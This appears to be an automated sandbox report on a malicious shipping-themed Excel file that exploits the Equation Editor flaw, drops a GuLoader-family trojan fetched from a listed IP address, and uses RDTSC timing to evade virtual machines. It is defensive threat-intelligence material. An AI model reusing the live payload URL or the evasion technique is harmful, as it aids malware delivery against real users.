                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: BL_SGN11203184.xlsxStream path 'EncryptedPackage' entropy: 7.99983573817 (max. 8.0)

                  Malware Analysis System Evasion:

                  barindex
                  Detected RDTSC dummy instruction sequence (likely for instruction hammering)Show sources
                  Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 0000000000449F94 second address: 000000000044A040 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a sub esp, 00000100h 0x00000010 mov edi, esp 0x00000012 test cx, dx 0x00000015 add esp, 00000100h 0x0000001b test eax, eax 0x0000001d mov dword ptr [edi+28h], eax 0x00000020 test bx, dx 0x00000023 mov esi, BEC25DA1h 0x00000028 add esi, 4F1D403Dh 0x0000002e xor esi, E8F819C0h 0x00000034 add esi, 1AD96BE2h 0x0000003a jmp 00007F0994A9E00Eh 0x0000003c pushad 0x0000003d mov eax, 0000003Fh 0x00000042 cpuid 0x00000044 popad 0x00000045 add esi, 00001000h 0x0000004b cmp esi, 0000F000h 0x00000051 je 00007F0994A9E520h 0x00000057 cmp esi, 7FFFF000h 0x0000005d je 00007F0994A9E514h 0x00000063 push 0AF1A7F6h 0x00000068 xor dword ptr [esp], 7FA34B79h 0x0000006f pushad 0x00000070 rdtsc
                  Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 000000000044A040 second address: 000000000044A040 instructions:
                  Tries to detect virtualization through RDTSC time measurementsShow sources
                  Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 0000000000449F94 second address: 000000000044A040 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a sub esp, 00000100h 0x00000010 mov edi, esp 0x00000012 test cx, dx 0x00000015 add esp, 00000100h 0x0000001b test eax, eax 0x0000001d mov dword ptr [edi+28h], eax 0x00000020 test bx, dx 0x00000023 mov esi, BEC25DA1h 0x00000028 add esi, 4F1D403Dh 0x0000002e xor esi, E8F819C0h 0x00000034 add esi, 1AD96BE2h 0x0000003a jmp 00007F0994A9E00Eh 0x0000003c pushad 0x0000003d mov eax, 0000003Fh 0x00000042 cpuid 0x00000044 popad 0x00000045 add esi, 00001000h 0x0000004b cmp esi, 0000F000h 0x00000051 je 00007F0994A9E520h 0x00000057 cmp esi, 7FFFF000h 0x0000005d je 00007F0994A9E514h 0x00000063 push 0AF1A7F6h 0x00000068 xor dword ptr [esp], 7FA34B79h 0x0000006f pushad 0x00000070 rdtsc
                  Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 000000000044A040 second address: 000000000044A040 instructions:
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_00446454 rdtsc 4_2_00446454
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2336Thread sleep time: -300000s >= -30000sJump to behavior
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_00446454 rdtsc 4_2_00446454
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_00444440 mov eax, dword ptr fs:[00000030h]4_2_00444440
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_004436DE mov eax, dword ptr fs:[00000030h]4_2_004436DE
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_004490F5 mov eax, dword ptr fs:[00000030h]4_2_004490F5
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_004464F9 mov eax, dword ptr fs:[00000030h]4_2_004464F9
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_0044993D mov eax, dword ptr fs:[00000030h]4_2_0044993D
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_004443FB mov eax, dword ptr fs:[00000030h]4_2_004443FB
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
                  Source: vbc.exe, 00000004.00000002.2364939955.0000000000980000.00000002.00000001.sdmpBinary or memory string: Program Manager
                  Source: vbc.exe, 00000004.00000002.2364939955.0000000000980000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                  Source: vbc.exe, 00000004.00000002.2364939955.0000000000980000.00000002.00000001.sdmpBinary or memory string: !Progman

                  Mitre Att&ck Matrix

                  Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                  Valid AccountsExploitation for Client Execution12Path InterceptionProcess Injection12Masquerading111OS Credential DumpingSecurity Software Discovery31Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                  Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsExtra Window Memory Injection1Virtualization/Sandbox Evasion1LSASS MemoryVirtualization/Sandbox Evasion1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                  Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection12Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                  Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information11NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol121SIM Card SwapCarrier Billing Fraud
                  Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptExtra Window Memory Injection1LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                  Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Information Discovery22VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  BL_SGN11203184.xlsx22%ReversingLabsDocument-OLE.Exploit.CVE-2018-0802

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe31%MetadefenderBrowse
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe59%ReversingLabsWin32.Trojan.Jaik
                  C:\Users\Public\vbc.exe31%MetadefenderBrowse
                  C:\Users\Public\vbc.exe59%ReversingLabsWin32.Trojan.Jaik

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  http://103.155.82.236/fksdoc/svchost.exe12%VirustotalBrowse
                  http://103.155.82.236/fksdoc/svchost.exe100%Avira URL Cloudmalware
                  https://www.pos.nblwarehouse.my.id/bin_GgrWeMMq137.bin, http://benvenuti.rs/wp-co0%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  No contacted domains info

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://103.155.82.236/fksdoc/svchost.exetrue
                  • 12%, Virustotal, Browse
                  • Avira URL Cloud: malware
                  unknown
                  https://www.pos.nblwarehouse.my.id/bin_GgrWeMMq137.bin, http://benvenuti.rs/wp-cotrue
                  • Avira URL Cloud: safe
                  unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://www.day.com/dam/1.0F77229A3.emf.0.drfalse
                    high

                    Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public

                    IPDomainCountryFlagASNASN NameMalicious
                    103.155.82.236
                    unknownunknown
                    134687TWIDC-AS-APTWIDCLimitedHKtrue

                    General Information

                    Joe Sandbox Version:32.0.0 Black Diamond
                    Analysis ID:432590
                    Start date:10.06.2021
                    Start time:15:16:10
                    Joe Sandbox Product:CloudBasic
                    Overall analysis duration:0h 6m 21s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Sample file name:BL_SGN11203184.xlsx
                    Cookbook file name:defaultwindowsofficecookbook.jbs
                    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                    Number of analysed new started processes analysed:5
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • HDC enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Detection:MAL
                    Classification:mal100.troj.expl.evad.winXLSX@4/16@0/1
                    EGA Information:Failed
                    HDC Information:Failed
                    HCA Information:Failed
                    Cookbook Comments:
                    • Adjust boot time
                    • Enable AMSI
                    • Found application associated with file extension: .xlsx
                    • Found Word or Excel or PowerPoint or XPS Viewer
                    • Attach to Office via COM
                    • Scroll down
                    • Close Viewer
                    Warnings:
                    Show All
                    • Exclude process from analysis (whitelisted): dllhost.exe

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    15:17:07API Interceptor70x Sleep call for process: EQNEDT32.EXE modified

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    103.155.82.236spices requirement.xlsxGet hashmaliciousBrowse
                    • 103.155.82.236/fksdoc/svchost.exe
                    2773773737646_OOCL_INVOICE_937763.xlsxGet hashmaliciousBrowse
                    • 103.155.82.236/fwkdoc/svchost.exe
                    DRAFT BL_CMA_CGM.xlsxGet hashmaliciousBrowse
                    • 103.155.82.236/fwkdoc/svchost.exe

                    Domains

                    No context

                    ASN

                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    TWIDC-AS-APTWIDCLimitedHKspices requirement.xlsxGet hashmaliciousBrowse
                    • 103.155.82.236
                    Cancellation_1844611233_06082021.xlsmGet hashmaliciousBrowse
                    • 103.155.92.95
                    Cancellation_1844611233_06082021.xlsmGet hashmaliciousBrowse
                    • 103.155.92.95
                    Rebate_18082425_05272021.xlsmGet hashmaliciousBrowse
                    • 103.155.93.185
                    Rebate_18082425_05272021.xlsmGet hashmaliciousBrowse
                    • 103.155.93.185
                    DEBT_06032021_861309073.xlsmGet hashmaliciousBrowse
                    • 103.155.93.93
                    DEBT_06032021_861309073.xlsmGet hashmaliciousBrowse
                    • 103.155.93.93
                    2773773737646_OOCL_INVOICE_937763.xlsxGet hashmaliciousBrowse
                    • 103.155.82.236
                    Rebate_854427061_05272021.xlsmGet hashmaliciousBrowse
                    • 103.155.93.185
                    Rebate_854427061_05272021.xlsmGet hashmaliciousBrowse
                    • 103.155.93.185
                    Document_06022021_568261087_Copy.xlsmGet hashmaliciousBrowse
                    • 103.155.92.221
                    Document_06022021_568261087_Copy.xlsmGet hashmaliciousBrowse
                    • 103.155.92.221
                    DRAFT BL_CMA_CGM.xlsxGet hashmaliciousBrowse
                    • 103.155.82.236
                    Document_06022021_1658142991_Copy.xlsmGet hashmaliciousBrowse
                    • 103.155.92.221
                    Document_06022021_1658142991_Copy.xlsmGet hashmaliciousBrowse
                    • 103.155.92.221
                    PO (2).exeGet hashmaliciousBrowse
                    • 103.153.182.50
                    PO.exeGet hashmaliciousBrowse
                    • 103.153.182.50
                    Rebate_850149173_05272021.xlsmGet hashmaliciousBrowse
                    • 103.155.93.185
                    Rebate_850149173_05272021.xlsmGet hashmaliciousBrowse
                    • 103.155.93.185
                    Outstanding_Debt_591538347_05242021.xlsmGet hashmaliciousBrowse
                    • 103.155.92.157

                    JA3 Fingerprints

                    No context

                    Dropped Files

                    No context

                    Created / dropped Files

                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe
                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Category:downloaded
                    Size (bytes):147456
                    Entropy (8bit):5.607689655560483
                    Encrypted:false
                    SSDEEP:1536:Fttu3FssKUmvr9DJ1FJS1bQNZ6bp/+Dtr5m3XSt4lYS0eXJWUTFboob:ztu3alxx3fSQmbs55r4l6eXJWUB0ob
                    MD5:99BBF83ABE9D6E4ECC91493E32230833
                    SHA1:B0BD6BA2DC10EB5552EDC7A3460C80EE0EB1B11E
                    SHA-256:2B2A00650DC91D1A7CCFA4A62E3462762C62D8A092BDDB75943F87074F1D56A5
                    SHA-512:0F6B9F9A843F491B925AAB0AF5D4F08024A2D430C41022C23AFB46CE3ABDF7881E8D87AC6D93F5ADFC2F11AEE0F0BB0AC28FA2500EC118BC1ED496281D3AFEC6
                    Malicious:true
                    Yara Hits:
                    • Rule: JoeSecurity_GuLoader_1, Description: Yara detected GuLoader, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe, Author: Joe Security
                    Antivirus:
                    • Antivirus: Metadefender, Detection: 31%, Browse
                    • Antivirus: ReversingLabs, Detection: 59%
                    Reputation:low
                    IE Cache URL:http://103.155.82.236/fksdoc/svchost.exe
                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L......G.....................0............... ....@..........................P......0.......................................$...(....@..P...................................................................(... ....................................text............................... ..`.data...P.... ....... ..............@....rsrc...P....@.......0..............@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1E4E0F48.png
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
                    Category:dropped
                    Size (bytes):49744
                    Entropy (8bit):7.99056926749243
                    Encrypted:true
                    SSDEEP:768:wnuJ6p14x3egT1LYye1wBiPaaBsZbkCev17dGOhRkJjsv+gZB/UcVaxZJ2LEz:Yfp1UeWNYF1UiPm+/q1sxZB/ZS
                    MD5:63A6CB15B2B8ECD64F1158F5C8FBDCC8
                    SHA1:8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6
                    SHA-256:AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
                    SHA-512:BB42A40E6EADF558C2AAE82F5FB60B8D3AC06E669F41B46FCBE65028F02B2E63491DB40E1C6F1B21A830E72EE52586B83A24A055A06C2CCC2D1207C2D5AD6B45
                    Malicious:false
                    Reputation:moderate, very likely benign file
                    Preview: .PNG........IHDR..............I.M....IDATx....T.]...G.;..nuww7.s...U..K......Ih....q!i...K....t.'k.W..i..>.......B.....E.0....f.a.....e....++...P..|..^...L.S}r:..............sM....p..p-..y]...t7'.D)....../...k....pzos.......6;,..H.....U..a..9..1...$......*.kI<..\F...$.E....?[B(.9.....H..!.....0AV..g.m...23..C..g(.%...6..>.O.r...L..t1.Q-.bE......)........|i ..."....V.g.\.G..p..p.X[.....*%hyt...@..J...~.p.....|..>...~.`..E_...*.iU.G...i.O..r6...iV.....@..........Jte...5Q.P.v;..B.C...m......0.N......q...b.....Q...c.moT.e6OB...p.v"...."........9..G....B}...../m...0g...8......6.$.$]p...9.....Z.a.sr.;B.a....m...>...b..B..K...{...+w?....B3...2...>.......1..-.'.l.p........L....\.K..P.q......?>..fd.`w*..y..|y..,.....i..'&.?.....).e.D ?.06......U.%.2t........6.:..D.B....+~.....M%".fG]b\.[........1....".......GC6.....J.+......r.a...ieZ..j.Y...3..Q*m.r.urb.5@.e.v@@....gsb.{q-..3j........s.f.|8s$p.?3H......0`..6)...bD....^..+....9..;$...W::.jBH..!tK
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\21A36D14.png
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:PNG image data, 1686 x 725, 8-bit/color RGBA, non-interlaced
                    Category:dropped
                    Size (bytes):79394
                    Entropy (8bit):7.864111100215953
                    Encrypted:false
                    SSDEEP:1536:ACLfq2zNFewyOGGG0QZ+6G0GGGLvjpP7OGGGeLEnf85dUGkm6COLZgf3BNUdQ:7PzbewyOGGGv+6G0GGG7jpP7OGGGeLEe
                    MD5:16925690E9B366EA60B610F517789AF1
                    SHA1:9F3FE15AE44644F9ED8C2CA668B7020DF726426B
                    SHA-256:C3D7308B11E8C1EFD9C0A7F6EC370A13EC2C87123811865ED372435784579C1F
                    SHA-512:AEF16EA5F33602233D60F6B6861980488FD252F14DCAE10A9A328338A6890B081D59DCBD9F5B68E93D394DEF2E71AD06937CE2711290E7DD410451A3B1E54CDD
                    Malicious:false
                    Reputation:moderate, very likely benign file
                    Preview: .PNG........IHDR................J....sRGB.........gAMA......a.....pHYs...t...t..f.x....IDATx^....~.y.....K...E...):.#.Ik..$o.....a.-[..S..M*A..Bc..i+..e...u["R.., (.b...IT.0X.}...(..@...F>...v....s.g.....x.>...9s..q]s......w...^z...........?........9D.}.w}W..RK..........S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z._....|.#..fF..?.G......zO.C.......zO.%......'....S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z....._.W.~....S.......c..zO.C..N.vO.%............S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z..&nf..?........zO.C...o...{J-......._..S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z...6..........J..:.......SjI..=...}.zO.#.%.vO.+...vO.+}.R...6.f.'..m.~m.~..=..5C.....4[....%uw........M.r..M.k.:N.q4[<..o..k...G......XE=..b$.G.,..K...H'._nj..kJ_..qr.....I}|.._...>r.v~..G.*.)..#.>......R...._..j.G...Y.>..!......O..{....L.}S..|.=}.>..OU...m.ks/....x..l....X.]e......?.........$...F.........>..{.Qb......
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\221576A9.png
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
                    Category:dropped
                    Size (bytes):84203
                    Entropy (8bit):7.979766688932294
                    Encrypted:false
                    SSDEEP:1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
                    MD5:208FD40D2F72D9AED77A86A44782E9E2
                    SHA1:216B99E777ED782BDC3BFD1075DB90DFDDABD20F
                    SHA-256:CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
                    SHA-512:7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
                    Malicious:false
                    Reputation:moderate, very likely benign file
                    Preview: .PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u|0a.....].R.z...2......GJY|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..|...=.|K...w...}O..{|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..|j.....b.r7.O!F...c'......$...)....|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq|.0...e.v......17...:F
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5AE1779F.jpeg
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
                    Category:dropped
                    Size (bytes):8815
                    Entropy (8bit):7.944898651451431
                    Encrypted:false
                    SSDEEP:192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
                    MD5:F06432656347B7042C803FE58F4043E1
                    SHA1:4BD52B10B24EADECA4B227969170C1D06626A639
                    SHA-256:409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
                    SHA-512:358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
                    Malicious:false
                    Reputation:moderate, very likely benign file
                    Preview: ......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T.*.K..|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.*+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\79B68205.png
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:PNG image data, 1268 x 540, 8-bit/color RGBA, non-interlaced
                    Category:dropped
                    Size (bytes):51166
                    Entropy (8bit):7.767050944061069
                    Encrypted:false
                    SSDEEP:1536:zdKgAwKoL5H8LiLtoEdJ9OSbB7laAvRXDlBig49A:JDAQ9H8/GMSdhahg49A
                    MD5:8C29CF033A1357A8DE6BF1FC4D0B2354
                    SHA1:85B228BBC80DC60D40F4D3473E10B742E7B9039E
                    SHA-256:E7B744F45621B40AC44F270A9D714312170762CA4A7DAF2BA78D5071300EF454
                    SHA-512:F2431F3345AAB82CFCE2F96E1D54E53539964726F2E0DBC1724A836AD6281493291156AAD7CA263B829E4A1210A118E6FA791F198B869B4741CB47047A5E6D6A
                    Malicious:false
                    Reputation:moderate, very likely benign file
                    Preview: .PNG........IHDR.............q~.....sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^..;.,;.......d..........{...m.m....4...h..B.d...%x.?..{w.$#.Aff..?W.........x.(.......................^....{.......^j................................oP.C?@GGGGGGGGGG?@GGGGG.F}c.............E).....c._....w{}......e;.._ttttt.X..........C.....uOV.+..l...|?................@GGG?@GGG./...uK.WnM'.....s.s...`.........ttttt.:::..........:.z.{...'..=.......ttt..g.:::z......=......F..'..O..sLU..:nZ.DGGGGGGGGG.AGGGGGGGG.Y.....#~.......7,...................O..b.GZ..........].....].....]....]...CO.vX>......@GGGw/3.......tttt.2...s....n.U.!.....:.....:.....:....%...'..)w.....................>.{............<;...........^..z........./..=..........................~.]..q.t...AGGGGGGGGGG?@GGGGGGG...AA........................~..............z...^...\........._ttttt.X..........C....o.{.O.Y1........=....]^X......ttt..tttt.....f.%...............nAGGGG.....[.....=....b....?{.....=......
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7A9F521.jpeg
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
                    Category:dropped
                    Size (bytes):8815
                    Entropy (8bit):7.944898651451431
                    Encrypted:false
                    SSDEEP:192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
                    MD5:F06432656347B7042C803FE58F4043E1
                    SHA1:4BD52B10B24EADECA4B227969170C1D06626A639
                    SHA-256:409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
                    SHA-512:358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
                    Malicious:false
                    Preview: ......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T.*.K..|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.*+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8E0CA1A0.png
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:PNG image data, 399 x 605, 8-bit/color RGBA, non-interlaced
                    Category:dropped
                    Size (bytes):50311
                    Entropy (8bit):7.960958863022709
                    Encrypted:false
                    SSDEEP:768:hfo72tRlBZeeRugjj8yooVAK92SYAD0PSsX35SVFN0t3HcoNz8WEK6Hm8bbxXVGx:hf0WBueSoVAKxLD06w35SEVNz8im0AEH
                    MD5:4141C7515CE64FED13BE6D2BA33299AA
                    SHA1:B290F533537A734B7030CE1269AC8C5398754194
                    SHA-256:F6B0FE628E1469769E6BD3660611B078CEF6EE396F693361B1B42A9100973B75
                    SHA-512:74E9927BF0C6F8CB9C3973FD68DAD12B422DC4358D5CCED956BC6A20139B21D929E47165F77D208698924CB7950A7D5132953C75770E4A357580BF271BD9BD88
                    Malicious:false
                    Preview: .PNG........IHDR.......].......^....gAMA......a.....sRGB........ cHRM..z&..............u0...`..:....p..Q<....bKGD..............oFFs.......F.#-nT....pHYs...%...%.IR$.....vpAg.......0...O.....IDATx...h.w....V!...D.........4.p .X(r..x.&..K.(.L...P..d5.R......b.......C...BP...,% ....qL.,.!E.ni..t......H._......G..|~=.....<..#.J!.N.a..a.Q.V...t:.M.v;=..0.s..ixa...0..<...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..qM../.u....h6..|.22..g4M.........C.u..y,--..'....a.?~.W.\i.>7q.j..y....iLNN.....5\..w"..b~~...J.sssm.d.Y.u.G....s.\..R.`qq.....C;..$..&..2..x..J..fgg...]=g.Y.y..N..(SN.S8.eZ.T...=....4.?~..uK.;....SSS...iY.Q.n.I.u\.x..o.,.av.N.(..H..B..X......... ..amm...h4.t:..].j..tz[.(..#..}yy./..".z.-[!4....a...jj......,dY.7.|.F.....\.~.g.....x..Y...R..\.....w.\.h..K....h..nM
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\988F9842.png
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
